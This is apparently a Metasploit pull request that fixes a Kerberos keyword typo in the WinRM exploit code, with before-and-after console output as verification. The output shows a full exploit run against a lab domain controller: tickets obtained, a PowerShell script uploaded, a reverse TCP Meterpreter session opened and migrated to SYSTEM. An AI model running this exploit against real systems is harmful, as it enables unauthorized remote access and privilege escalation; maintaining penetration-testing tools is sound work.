### PR TITLE
Fix crash in winrm_script_exec when using Kerberos authentication

### DIFF
--- a/lib/msf/core/exploit/remote/winrm.rb
+++ b/lib/msf/core/exploit/remote/winrm.rb
@@ -89,7 +89,7 @@ module Exploit::Remote::WinRM
         framework: framework,
         framework_module: self,
         cache_file: datastore['WinrmKrb5Ccname'].blank? ? nil : datastore['WinrmKrb5Ccname'],
-        offered_types: Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['KrbOfferedEncryptionTypes']),
+        offered_etypes: Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['KrbOfferedEncryptionTypes']),
         mutual_auth: true,
         use_gss_checksum: true
       )

--- a/modules/auxiliary/scanner/winrm/winrm_login.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -50,9 +50,7 @@ class MetasploitModule < Msf::Auxiliary
     )
 
     kerberos_authenticator_factory = nil
-    preferred_auth = 'Negotiate'
     if datastore['WinrmAuth'] == KERBEROS
-      preferred_auth = 'Kerberos'
       kerberos_authenticator_factory = -> (username, password, realm) do
         Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::HTTP.new(
           host: datastore['DomainControllerRhost'],


### PR DESCRIPTION
Fixing a typo with winrm's offered etypes field

## Verification

Before:

```
msf6 exploit(windows/winrm/winrm_script_exec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrmauth=kerberos domaincontrollerrhost=192.168.123.13 winrmrhostname=dc3.adf3.local domain=adf3.local

[*] Started reverse TCP handler on 192.168.123.1:4444 
[-] Exploit failed: ArgumentError unknown keyword: :offered_types
[*] Exploit completed, but no session was created.
```

After:

```
msf6 exploit(windows/winrm/winrm_script_exec) > run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrmauth=kerberos domaincontrollerrhost=192.168.123.13 winrmrhostname=dc3.adf3.local domain=adf3.local

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Checking for Powershell 2.0
[+] 192.168.123.13:88 - Received a valid TGT-Response
[*] 192.168.123.13:5985 - TGT MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230120105338_default_192.168.123.13_mit.kerberos.cca_022613.bin
[+] 192.168.123.13:88 - Received a valid TGS-Response
[*] 192.168.123.13:5985 - TGS MIT Credential Cache ticket saved to /Users/adfoster/.msf4/loot/20230120105338_default_192.168.123.13_mit.kerberos.cca_170970.bin
[+] 192.168.123.13:88 - Received a valid delegation TGS-Response
[+] 192.168.123.13:88 - Received AP-REQ. Extracting session key...
[-] You selected an x86 payload for an x64 target...trying to run in compat mode
[*] Grabbing %TEMP%
[*] Uploading powershell script to C:\Users\ADMINI~1\AppData\Local\Temp\Sluxqmiw.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Session ID 5 (192.168.123.1:4444 -> 192.168.123.13:58588) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is powershell.exe (2296) as: ADF3\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[-] Could not migrate to services.exe.
[-] Could not migrate to wininit.exe.
[*] Trying svchost.exe (860)
[+] Successfully migrated to svchost.exe (860) as: NT AUTHORITY\SYSTEM
[*] Meterpreter session 5 opened (192.168.123.1:4444 -> 192.168.123.13:58588) at 2023-01-20 10:53:48 +0000

meterpreter >
```